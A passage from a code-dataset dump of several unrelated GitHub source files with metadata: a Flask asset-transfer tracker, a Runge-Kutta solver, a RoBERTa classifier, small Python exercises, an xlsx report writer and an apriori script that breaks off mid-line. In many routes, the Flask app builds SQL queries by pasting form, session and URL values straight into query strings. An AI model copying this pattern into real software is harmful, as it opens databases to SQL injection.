NULL)\")\n loadedTransfers = cur.fetchall()\n\n # Render template with both assets in transit and assets waiting on being loaded\n return render_template('dashboard.html', username=session['username'],role=session['role'], message=message, transfers=transfers, loadedTransfers=loadedTransfers)\n elif (session['role'] == \"Facilities Officer\"):\n # Select all transfers still needing approval\n cur.execute(\"SELECT assets.tag, facilities.name, transfers.transfer_pk FROM assets, facilities, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk) AND (transfers.approver_fk IS NULL)\")\n transfers = cur.fetchall()\n return render_template('dashboard.html', username=session['username'], role=session['role'], message=message, transfers=transfers)\n \n return render_template('dashboard.html', username=session['username'], role=session['role'], message=message)\n\n# Route to add a facility\n@app.route('/add_facility', methods=['GET','POST'])\ndef add_facility(error=\"\"):\n # If just visiting page\n if (request.method == 'GET'):\n # Get all existing facilities form the DB\n cur.execute(\"SELECT * FROM facilities;\")\n facilities = cur.fetchall()\n # Load them into the page\n return render_template('add_facility.html', facilities=facilities, error=error)\n \n # If adding a facility\n elif (request.method == 'POST'):\n # Get form data\n facilityName = request.form.get('facilityName')\n facilityCode = request.form.get('facilityCode')\n\n # Get the facility with that name\n cur.execute(\"SELECT * FROM facilities WHERE (name = \\'\" + facilityName + \"\\' OR code = \\'\" + facilityCode + \"\\')\")\n facility = cur.fetchone()\n\n # Facility already exists\n if (facility != None):\n return render_template('error.html',error=\"Facility already exists!\")\n # If facility doesn't exist yet, add to the DB\n else:\n cur.execute(\"INSERT INTO facilities (name, code) VALUES (%s, %s)\", (facilityName, facilityCode))\n conn.commit()\n return redirect('/add_facility')\n\n# Route to add an asset\n@app.route('/add_asset', methods=['GET','POST'])\ndef add_asset():\n # If visiting page\n if (request.method == 'GET'):\n # Get all the facility names\n cur.execute(\"SELECT name FROM facilities;\")\n facilityNames = cur.fetchall()\n # Get all current assets\n cur.execute(\"SELECT * FROM assets;\")\n assets = cur.fetchall()\n # And load them into the page\n return render_template('add_asset.html', facilities=facilityNames, assets=assets)\n \n # If trying to add an asset\n elif (request.method == 'POST'):\n # Get form data\n assetTag = request.form.get('assetTag')\n assetDesc = request.form.get('assetDesc')\n facilityName = request.form.get('facility')\n rawtime = request.form.get('date')\n dtobj = datetime.strptime(rawtime, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n\n # Get asset with same tag, if any\n cur.execute(\"SELECT * FROM assets WHERE tag = \\'\" + assetTag + \"\\'\")\n asset = cur.fetchone()\n\n # If found asset with the same tag already, error\n if (asset != None):\n return render_template('error.html', error=\"Asset with tag \" + assetTag + \" already exists!\")\n \n # Otherwise add this asset to the DB\n else: \n cur.execute(\"SELECT facility_pk FROM facilities WHERE facilities.name = \\'\" + facilityName + \"\\'\")\n facilityFK = cur.fetchone()\n cur.execute(\"INSERT INTO assets (tag, description, facility_fk, arrival_dt) VALUES (%s, %s, %s, %s)\", (assetTag, assetDesc, facilityFK, dtobj))\n conn.commit()\n return redirect('/add_asset')\n\n# Route to dispose of an asset\n@app.route('/dispose_asset', methods=['GET','POST'])\ndef dispose_asset():\n # Get logged in user's UN\n loginUN = session['username']\n role = session['role']\n\n # If they don't have the correct role, error\n if (role != \"Logistics Officer\"):\n return render_template(\"error.html\", error=\"User's role must be Losgistics Officer in order to modify assets\")\n \n # If visiting page, load vanilla page\n elif (request.method == 'GET'):\n cur.execute(\"SELECT * FROM assets\")\n assets = cur.fetchall()\n return render_template('dispose_asset.html', assets=assets)\n \n # If trying to dispose of an asset\n elif (request.method == 'POST'):\n # Get form data\n tag = request.form.get('assetTag')\n rawdt = request.form.get('date')\n dtobj = datetime.strptime(rawdt, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n\n # Find asset to dispose of\n cur.execute(\"SELECT * FROM assets WHERE assets.tag = \\'\" + tag + \"\\'\")\n asset = cur.fetchone()\n\n # If asset found\n if (asset != None):\n # If it is already disposed of, error\n if (asset[3] == None):\n return render_template('error.html', error=\"Asset already disposed\")\n # Else, update with disposed facility (NULL) and form date\n else:\n cur.execute(\"UPDATE assets SET dispose_dt = %s WHERE assets.tag = %s\", (dtobj, tag))\n # Asset not found, error\n else:\n return render_template('error.html', error=\"Asset does not exist!\")\n\n # Save changes and redirect to dashboard\n conn.commit()\n return redirect('/dashboard')\n\n# Route to report assets from a given day\n@app.route('/asset_report', methods=['GET','POST'])\ndef asset_report():\n # Get facility names for loading into page\n cur.execute(\"SELECT facilities.name FROM facilities\")\n facilityNames = cur.fetchall()\n\n # If visiting page, load page\n if (request.method == 'GET'):\n return render_template('asset_report.html', facilities=facilityNames)\n \n # If generating a report\n elif (request.method == 'POST'):\n # Get form data\n facility = request.form.get('facility')\n rawdate = request.form.get('date')\n dtobj = datetime.strptime(rawdate, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n print (dtobj)\n\n # If no facility indicated, load all assets from DB where arrival date is BEFORE date on form (already arrived)\n if (facility == \"All\"):\n cur.execute(\"SELECT * FROM assets WHERE (assets.arrival_dt <= %s) AND (assets.dispose_dt IS NULL OR assets.dispose_dt > %s)\", (dtobj, dtobj))\n \n # Else do above only with assets from given facility\n else:\n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + facility + \"\\'\")\n fpk = cur.fetchone()\n cur.execute(\"SELECT * FROM assets WHERE (assets.arrival_dt <= %s AND assets.facility_fk = %s AND (assets.dispose_dt IS NULL OR assets.dispose_dt > %s))\", (dtobj, fpk, dtobj))\n\n # Load report results and facility names into the page\n assets = cur.fetchall()\n print (assets)\n return render_template('asset_report.html', assets=assets, facilities=facilityNames, facility=facility, date=dtobj)\n\n# Route to initiate transit requests\n@app.route('/transfer_req', methods=['GET','POST'])\ndef transfer_req():\n # Verify user is a Logistics Officer\n if (session['role'] != \"Logistics Officer\"):\n return render_template('error.html', error=\"Must be a Logistics Officer to initiate transfer requests!\")\n \n # Display assets available to be transferred\n elif (request.method == \"GET\"):\n cur.execute(\"SELECT facilities.name FROM facilities\")\n facilities = cur.fetchall()\n cur.execute(\"SELECT assets.tag, facilities.name FROM assets, facilities WHERE assets.facility_fk = facilities.facility_pk\")\n assets = cur.fetchall()\n return render_template('transfer_req.html', facilities=facilities, assets=assets)\n \n # If user requested a transfer\n elif (request.method == \"POST\"):\n # Check validity of asset tag (kept as text input instead of select options since it sounded \n # like some kind of input validation was needed)\n tag = request.form.get('tag')\n cur.execute(\"SELECT * FROM assets WHERE assets.tag = \\'\" + tag + \"\\';\")\n asset = cur.fetchone()\n if (asset == None):\n return render_template('error.html', error=\"Error: Asset tag does not exist!\")\n \n source = request.form.get('source')\n dest = request.form.get('dest')\n\n # If user tries to transfer asset to the same facility\n if (source == dest):\n return render_template('error.html', error=\"Source and destination cannot be the same facility!\")\n\n # Since facilities are loaded into select from DB, they must be valid, no validation necessary\n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + source + \"\\';\")\n source_fk = cur.fetchone()\n\n # If asset is not saved as being in the facility transferred FROM\n if (asset[3] != source_fk[0]):\n return render_template('error.html', error=\"Asset is not at the source facility!\")\n \n cur.execute(\"SELECT facilities.facility_pk FROM facilities WHERE facilities.name = \\'\" + dest + \"\\';\")\n dest_fk = cur.fetchone()\n\n # Get current time\n curdt = datetime.now()\n\n cur.execute(\"SELECT users.user_pk FROM users WHERE users.username = \\'\" + session['username'] + \"\\';\")\n user = cur.fetchone()\n\n # Insert transfer request into table and commit\n cur.execute(\"INSERT INTO transfers (requester_fk, submit_dt, source_fk, dest_fk, asset_fk) VALUES (%s, %s, %s, %s, %s)\", (user[0], curdt, source_fk[0], dest_fk[0], asset[0]))\n conn.commit()\n\n return render_template(\"success.html\", message=\"Transfer request for asset \" + tag + \" successfully submitted\") \n\n# Route to approve of transit requests\n@app.route('/approve_req/', methods=['GET'])\n@app.route('/approve_req//', methods=['POST'])\ndef approve_req(transfer_pk=-1, approve=\"True\"):\n # Verify user is a Facilities Officer\n if (session['role'] != \"Facilities Officer\"):\n return render_template('error.html', error=\"Must be a Facilities Officer to approve assets!\")\n # Verify transfer_pk is valid\n elif (request.method == 'GET'):\n if (transfer_pk == -1):\n return render_template('error.html', error=\"Invalid transfer key! Transfer is not logged in the database!\")\n else:\n cur.execute(\"SELECT assets.tag, facilities.name, transfers.transfer_pk FROM assets, facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk)\")\n transfer = cur.fetchone()\n return render_template('approve_req.html', transfer=transfer)\n # If Facilities Officer approved/disapproved of transfer\n elif (request.method == 'POST'):\n # If transfer is approved, update DB with approving user and datetime of approval\n if (approve == \"True\"):\n cur.execute(\"SELECT user_pk FROM users WHERE users.username = \\'\" + session['username'] + \"\\';\")\n user_pk = cur.fetchone()[0]\n cur.execute(\"UPDATE transfers SET approver_fk = %s, approve_dt = %s WHERE transfers.transfer_pk = %s\", (user_pk, datetime.now(), transfer_pk))\n message = \"Transfer approved\"\n # If transfer is not approved, remove it from the DB\n else:\n cur.execute(\"DELETE FROM transfers WHERE transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\';\")\n message = \"Transfer removed from databse\"\n # Regardless of approval, save DB changes and redirect to dashboard\n conn.commit()\n return redirect('/dashboard/' + message)\n\n# Route to set the load and unload times of approved transfer requests\n@app.route('/update_transit/', methods=['GET', 'POST'])\ndef update_transit(transfer_pk = -1):\n # Only allow Logistics Officers to use this route\n if (session['role'] != \"Logistics Officer\"):\n return render_template('error.html', error=\"Only Logistics Officers can update load and unload times!\")\n # Verify transfer_pk is valid\n elif (request.method == 'GET'):\n if (transfer_pk == -1):\n return render_template('error.html', error=\"Invalid transfer key! Transfer does not exist in the database!\")\n else:\n # Generate and display asset tag, source and dest facility for transfer\n cur.execute(\"SELECT assets.tag, facilities.name, transfer_pk, transfers.load_dt FROM assets, facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (assets.assets_pk = transfers.asset_fk) AND (facilities.facility_pk = transfers.dest_fk)\")\n transfer = cur.fetchone()\n cur.execute(\"SELECT facilities.name FROM facilities, transfers WHERE (transfers.transfer_pk = \\'\" + str(transfer_pk) + \"\\') AND (facilities.facility_pk = transfers.source_fk)\")\n source = cur.fetchone()[0]\n return render_template('update_transit.html', transfer=transfer, source=source)\n # Updated load/unload time\n elif (request.method == 'POST'):\n # If request was for updating load, update load time\n if (request.form.get('load_dt')):\n rawLDT = request.form.get('load_dt')\n load_dt = datetime.strptime(rawLDT, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n cur.execute(\"UPDATE transfers SET load_dt = %s WHERE transfers.transfer_pk = %s\", (load_dt, transfer_pk))\n message = \"Transfer load time recorded\"\n # If request was for updating unload, update unload time\n elif (request.form.get('unload_dt')):\n rawUDT = request.form.get('unload_dt')\n unload_dt = datetime.strptime(rawUDT, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n cur.execute(\"UPDATE transfers SET unload_dt = %s WHERE transfers.transfer_pk = %s\", (unload_dt, transfer_pk))\n message = \"Transfer unload time recorded\"\n \n # Commit changes and redirect to the dashboard\n conn.commit()\n return redirect(\"/dashboard/\" + message)\n\n# Route for a transfer report of all assets in transit\n@app.route('/transfer_report', methods=['GET','POST'])\ndef transfer_report():\n # Render template without results\n if (request.method == 'GET'):\n return render_template('transfer_report.html')\n # Generate results list and render template with results\n elif (request.method == 'POST'):\n rawdt = request.form.get('date')\n dtobj = datetime.strptime(rawdt, \"%Y-%m-%d\" + \"T\" + \"%H:%M\")\n\n # Add to results if transfer load <= dtobj, and transfer unload >= dtobj\n cur.execute(\"SELECT assets.tag, transfers.load_dt, transfers.unload_dt FROM assets, transfers WHERE (transfers.load_dt <= %s) AND (transfers.unload_dt >= %s) AND (transfers.asset_fk = assets.assets_pk)\", (dtobj, dtobj))\n results = cur.fetchall()\n\n return render_template('transfer_report.html', results=results)\n\n# Logs user out of the session and returns them to the login screen\n@app.route('/logout', methods=['GET','POST'])\ndef logout():\n session.pop('username', None)\n return render_template('/login.html', error=\"Successfully logged out!\")\n\n\n","repo_name":"238alexg/322","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":21827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72544826085","text":"class RungeKutta:\n\n def __init__(self, delta_t):\n self.v0 = 5.0 # velocidade inicial(m/s)\n self.y0 = 200.0 # posição inicial(m)\n self.k = 0.25 # constante de proporcionalidade(kg/s)\n self.m = 2 # massa(kg)\n self.g = 10 # aceleração gravitacional(m/s^2)\n self.delta_t = delta_t\n\n \n def pontos_criticos(self):\n tempo = 0.0 # a variável guarda o tempo decorrido de 0s até o momento atual da partícula\n v_ant = self.v0 # variável que guardará a velocidade a cada iteração\n y_ant = self.y0 # variável que guardará a altura a cada iteração\n y_atual = y_ant\n\n while(y_atual > 0): # testar se a altura já é suficientemente perto de 0m(nível do mar)\n v_atual, y_atual = self.sol_aproximada(v_ant, y_ant)\n tempo = tempo + self.delta_t\n\n if(v_atual*v_ant < 0): # altura máxima: v(t) = 0 m/s\n if(y_ant > y_atual):\n y_alt_max = y_ant # altura máxima da trajetória\n t_alt_max = tempo - self.delta_t # momento em que alcançou a altura máxima\n else:\n y_alt_max = y_atual # altura máxima da trajetória\n t_alt_max = tempo # momento em que alcançou a altura máxima\n \n if(y_atual*y_ant < 0): # fim da trajetória: y(t) = 0 m\n v_mar = v_ant # velocidade quando chegou ao mar\n t_mar = tempo - self.delta_t # tempo total da trajetória\n\n v_ant = v_atual\n y_ant = y_atual\n \n return y_alt_max, t_alt_max, v_mar, t_mar\n\n \n def auxiliar1(self, v_ant):\n result1 = [0] * 2 # posição 0: velocidade, posição 1: altura\n\n # Equação 47\n result1[0] = -self.g - ((self.k/self.m)*v_ant)\n result1[1] = v_ant\n\n return result1\n\n \n def auxiliar2(self, v_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n\n # Equação 48\n v_aux2 = v_ant + (self.delta_t/2)*auxiliar1[0]\n \n # Equação 49\n result2 = self.auxiliar1(v_aux2) # posição 0: velocidade, posição 1: altura\n\n return result2\n\n \n def auxiliar3(self, v_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n auxiliar2 = self.auxiliar2(v_ant)\n\n # Equação 50\n v_aux3 = v_ant + self.delta_t*(-auxiliar1[0] + 2*auxiliar2[0])\n\n # Equação 51\n result3 = self.auxiliar1(v_aux3) # posição 0: velocidade, posição 1: altura\n\n return result3\n\n \n def sol_aproximada(self, v_ant, y_ant):\n auxiliar1 = self.auxiliar1(v_ant)\n auxiliar2 = self.auxiliar2(v_ant)\n auxiliar3 = self.auxiliar3(v_ant)\n\n result = [0] * 2 # posição 0: velocidade, posição 1: altura\n\n # Equação 52\n result[0] = v_ant + self.delta_t*((auxiliar1[0] + 4*auxiliar2[0] + auxiliar3[0])/6)\n result[1] = y_ant + self.delta_t*((auxiliar1[1] + 4*auxiliar2[1] + auxiliar3[1])/6)\n\n return result[0], result[1] ","repo_name":"leosilva99/trabalhos_MN2","sub_path":"trabalho17_mn2/RungeKutta.py","file_name":"RungeKutta.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71921351204","text":"\nimport logging\nimport warnings\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss, MSELoss\n\nfrom transformers.configuration_roberta import RobertaConfig\nfrom transformers.modeling_bert import BertPreTrainedModel\nfrom transformers.activations import gelu\n\nfrom transformers import RobertaModel\n\nlogger = logging.getLogger(__name__)\n\n_TOKENIZER_FOR_DOC = \"RobertaTokenizer\"\n\nROBERTA_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"roberta-base\",\n \"roberta-large\",\n \"roberta-large-mnli\",\n \"distilroberta-base\",\n \"roberta-base-openai-detector\",\n \"roberta-large-openai-detector\",\n # See all RoBERTa models at https://huggingface.co/models?filter=roberta\n]\n\nclass RobertaForJointEntityRelationClassification(BertPreTrainedModel):\n config_class = RobertaConfig\n base_model_prefix = \"roberta\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.roberta = RobertaModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.token_classifier = nn.Linear(config.hidden_size, config.num_labels)\n self.relation_classifier = RobertaRelationClassificationHead(config.hidden_size, config.hidden_dropout_prob, 2)\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n relation_labels=None,\n output_attentions=None,\n output_hidden_states=None,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):\n Labels for computing the token classification loss.\n Indices should be in ``[0, ..., config.num_labels - 1]``.\n relation_labels:\n Labels for computing the relation classification loss.\n Currently, it only accepts classes of 0 or 1.\n Returns:\n :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.RobertaConfig`) and inputs:\n loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when ``labels`` is provided) :\n Classification loss.\n scores:\n list of (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.num_labels)`) and relation scores\n Entity classification scores and relation scores(before SoftMax) .\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n outputs = self.roberta(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n sequence_output = outputs[0]\n\n sequence_output = self.dropout(sequence_output)\n logits_a = self.token_classifier(sequence_output)\n logits_b = self.relation_classifier(sequence_output)\n\n outputs = ([logits_a, logits_b],) + outputs[2:] # add hidden states and attention if they are here\n\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n # Only keep active parts of the loss\n if attention_mask is not None:\n active_loss = attention_mask.view(-1) == 1\n active_logits = logits_a.view(-1, self.num_labels)\n active_labels = torch.where(\n active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels)\n )\n loss_a = loss_fct(active_logits, active_labels)\n else:\n loss_a = loss_fct(logits_a.view(-1, self.num_labels), labels.view(-1))\n loss = loss_a\n if relation_labels is not None:\n loss_fct = CrossEntropyLoss()\n loss_b = loss_fct(logits_b.view(-1, 2), relation_labels.view(-1))\n if labels is None:\n loss = loss_b\n else:\n # TODO explain loss here\n loss += loss_b.div(20)\n outputs = (loss,) + outputs\n\n return outputs # (loss), scores, (hidden_states), (attentions)\n\n\n\nclass RobertaRelationClassificationHead(nn.Module):\n \"\"\"Head for sentence-level classification tasks.\"\"\"\n\n def __init__(self, hidden_size, hidden_dropout_prob, num_relations):\n super().__init__()\n self.dense = nn.Linear(hidden_size, hidden_size)\n self.dropout = nn.Dropout(hidden_dropout_prob)\n self.out_proj = nn.Linear(hidden_size, num_relations)\n\n def forward(self, features, **kwargs):\n x = features[:, 0, :] # take token (equiv. to [CLS])\n x = self.dropout(x)\n x = self.dense(x)\n x = torch.tanh(x)\n x = self.dropout(x)\n x = self.out_proj(x)\n return x\n","repo_name":"yoonsikp/clerx_lm","sub_path":"model/torch_jer.py","file_name":"torch_jer.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11607136002","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/4/7 19:20\n# @Author : XiaTian\n# @File : 客户端.py\n\nimport socket\n\n\nphone = socket.socket(family=socket.AF_INET,type=socket.SOCK_STREAM)\nphone.connect(('127.0.0.1',8081))\nwhile True:\n c_msg = input('>>:').strip()\n phone.send(str(c_msg).encode('utf-8'))\n data = phone.recv(1024)\n print(data)\nphone.close()\n\n\n","repo_name":"summer5625/Mygit","sub_path":"第三模块_面向对象_网络编程基础/网络编程/day1/通信循环/客户端.py","file_name":"客户端.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32348104107","text":"from tkinter import *\nroot = Tk()\nroot.geometry(\"500x300\")\n\ndef getvals():\n print(\"Accepted\")\n\n# Heading\nLabel(root, text=\"Python Registration Form\", font=\"arial 15 bold\").grid(row = 0, column = 3)\n\n# Field name\nname = Label(root, text= \"Name\")\nphone = Label(root, text= \"Phone\")\ngender = Label(root, text= \"Gender\")\nemergency = Label(root, text= \"Emergency Contact\")\npaymentmethod = Label(root, text= \"Payment Method\")\n\n# Packing fields\nname.grid(row=1, column = 2)\nphone.grid(row=2, column = 2)\ngender.grid(row=3, column = 2)\nemergency.grid(row=4, column = 2)\npaymentmethod.grid(row=5, column = 2)\n\n# Variable fo storing data\nnamevalue = StringVar\nphonevalue = StringVar\ngendervalue = StringVar\nemergencyvalue = StringVar\npaymentmethodvalue = StringVar\ncheckvalue = IntVar\n\n# Creating entry field\nnameentry = Entry(root, textvariable = namevalue)\nphoneentry = Entry(root, textvariable = phonevalue)\ngenderentry = Entry(root, textvariable = gendervalue)\nemergencyentry = Entry(root, textvariable = emergencyvalue)\npaymentmethodentry = Entry(root, textvariable = paymentmethodvalue)\n\n# Packing entry fields\nnameentry.grid(row = 1, column = 3)\nphoneentry.grid(row = 2, column = 3)\ngenderentry.grid(row = 3, column = 3)\nemergencyentry.grid(row = 4, column = 3)\npaymentmethodentry.grid(row = 5, column = 3)\n\n# Creating checkbox\ncheckbutton = Checkbutton(text = \"remember me?\", variable = checkvalue)\ncheckbutton.grid(row = 6, column = 3)\n\n# Submit button\nButton(text = \"Submit\", command = getvals).grid(row = 7, column = 3)\n\nroot.mainloop()","repo_name":"adamgovoni/registrationForm","sub_path":"registration_form.py","file_name":"registration_form.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43397981195","text":"print(\"=\" * 80)\r\nimport random\r\nfrom time import sleep\r\npensando = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nn = random.choice(pensando)\r\nr = 'v'\r\npalpites = 0\r\nwhile r != n:\r\n r = int(input(\"Qual o número que o computador está pensando de 0 a 10? \"))\r\n palpites += 1\r\n sleep(2)\r\n if r < n:\r\n print(\"Você errou, tente novmente um número maior.\")\r\n if r > n:\r\n print(\"Você errou, tente novamente um número menor.\")\r\n if r == n:\r\n print(\"Você acertou!\")\r\nprint(\"Você precisou de {} palpites para acertar.\".format(palpites))\r\nprint(\"FIM\")\r\nprint(\"=\" * 80)\r\n","repo_name":"Dryixn/Jogo-adivinhacao","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3353532919","text":"######### CONSTANTS #########\nFILE_NAMES = ['AAFA_CARB',\n 'FILII_NAMER']\n\nFILE_NAME_TO_POPULATIONS = {'AAFA_CARB': ['AAFA', 'CARB', 'ALL'],\n 'FILII_NAMER': ['FILII', 'NAMER', 'ALL']}\n\n# levels of the alleles\nLEVELS_LIST = [\n 'A',\n 'B',\n 'C',\n 'DQB1',\n 'DRB1'\n]\n\n# dictionary of levels -> relative positions in the real data file\nLEVELS_DICT = {'A': 0,\n 'B': 1,\n 'C': 2,\n 'DQB1': 3,\n 'DRB1': 4}\n\n\n","repo_name":"ExtraFlash/HWE","sub_path":"plots/chi_squared/haplotypes_data/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42371431293","text":"import xlsxwriter\nfrom datetime import datetime\n\n\n\nclass Planilha:\n def __init__(self, nomeplanilha: str, linhas: int):\n \n self.nome_arquivo_xls = nomeplanilha\n self.linhas_planilha = linhas\n self.criaPlanilha()\n \n\n def diaCorrente(self):\n data = datetime.today()\n strData = data.strftime('%d/%m/%Y')\n return strData\n\n\n def criaPlanilha(self):\n ultima_linha = self.linhas_planilha\n self.workbook = xlsxwriter.Workbook(self.nome_arquivo_xls)\n self.worksheet = self.workbook.add_worksheet()\n self.worksheet.set_landscape()\n self.worksheet.add_table(f'A3:J{ultima_linha+3}',{'header_row' : False})\n\n\n def criar_titulo(self, titulo: str):\n self.worksheet.set_row(0, 25)\n mesclar_celula = self.workbook.add_format({\n 'bold': 1,\n 'border': 2,\n 'font_size': 14,\n 'align': 'center',\n 'valign': 'vcenter'})\n self.worksheet.merge_range('A1:J1', titulo, mesclar_celula)\n\n\n def criar_cabecalho(self, colunas):\n letras_coluna = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n format = self.workbook.add_format({'align': 'center', 'valign': 'vcenter', 'bold': 1, 'border': 1})\n self.worksheet.set_row(1, 6)\n self.worksheet.set_column(0, 0, 10)\n self.worksheet.set_column(1, 1, 11)\n self.worksheet.set_column(2, 2, 30)\n self.worksheet.set_column(3, 3, 15)\n self.worksheet.set_column(4, 4, 5)\n self.worksheet.set_column(5, 5, 11)\n self.worksheet.set_column(6, 6, 8)\n self.worksheet.set_column(7, 7, 4)\n self.worksheet.set_column(8, 8, 9)\n for i, nome_coluna in enumerate(colunas):\n celula = letras_coluna[i].upper() + '3'\n self.worksheet.write(celula, nome_coluna, format)\n\n\n def escrever(self, local: str, campo: any, negrito: bool, valor: bool):\n # Formatar texto em negrito\n if negrito:\n self.negrito = self.workbook.add_format({'bold': True})\n self.worksheet.write(local, campo, self.negrito)\n else:\n self.negrito = self.workbook.add_format({'bold': False})\n\n if valor:\n self.currency_format = self.workbook.add_format({'num_format': 'R$ #,##0.00'})\n self.worksheet.write(local, campo, self.currency_format)\n else:\n self.worksheet.write(local, campo, self.negrito)\n \n \n def fecha_planilha(self):\n self.workbook.close()\n\nif __name__ == '__main__':\n planilha = Planilha('relatorio_teste.xlsx',linhas=1)\n colunas = ['PixID', 'Data', 'Nome', 'Valor', 'Caixa', 'Situação', 'Liberado', 'Ano', 'NumCert', 'NumProt']\n planilha.criar_titulo('Relatório de Pagamentos pix do dia: ' + planilha.diaCorrente())\n planilha.criar_cabecalho(colunas)\n planilha.escrever('A4', 125, False, False)\n planilha.escrever('B4', '09/08/2023', False, False)\n planilha.escrever('C4', 'Eduardo Rossini', False, False)\n planilha.escrever('D4', 741526.09, False, valor=True)\n planilha.escrever('E4', 'isa', False, False)\n planilha.escrever('F4', 'Pago', False, False)\n planilha.escrever('G4', 'bra', False, False)\n planilha.escrever('H4', 23, False, False)\n planilha.escrever('I4', 10258, False, False)\n planilha.escrever('J4', 502655, False, False)\n \n planilha.fecha_planilha()","repo_name":"cyborgrj/SisPag-Pix","sub_path":"xlsx/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18813861203","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 18 15:46:04 2020\r\n\r\n@author: Pedro\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import association_rules, apriori\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\naisles = pd.read_csv('aisles.csv')\r\ndepartments = pd.read_csv('departments.csv')\r\norder_products_prior = pd.read_csv('order_products__prior.csv')\r\norder_products_train = pd.read_csv('order_products__train.csv')\r\norders = pd.read_csv('orders.csv')\r\nproducts = pd.read_csv('products.csv')\r\nsample_submission = pd.read_csv('sample_submission.csv')\r\n\r\n#1) Data preparation\r\n#Create merge of orders and products\r\norder1 = order_products_train.merge(products, how='inner')\r\norder1 = order1.sort_values(by=['order_id','add_to_cart_order'])\r\norder2 = order1.groupby('order_id')['product_name'].agg(', '.join).reset_index()\r\n\r\n# 1) Apriori algorithm\r\n# get all shopping lists as one list\r\none_product = list(order2['product_name'].apply(lambda x: sorted(x.split(','))))\r\n\r\n# instantiate transcation encoder\r\nencoder = TransactionEncoder().fit(one_product)\r\nonehot = encoder.transform(one_product)\r\n\r\n# convert one-hot encode data to DataFrame\r\nonehot = pd.DataFrame(onehot, columns=encoder.columns_)\r\n\r\n# compute frequent items using the Apriori algorithm - Get up to three items\r\nfrequent_itemsets = apriori(onehot, min_support=.006, max_len=3, use_colnames=True)\r\nfrequent_itemsets.to_csv('frequent_itemsets.csv', index=False)\r\n\r\n# compute all association rules for frequent_itemsets\r\nrules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n# given that the left-hand side has 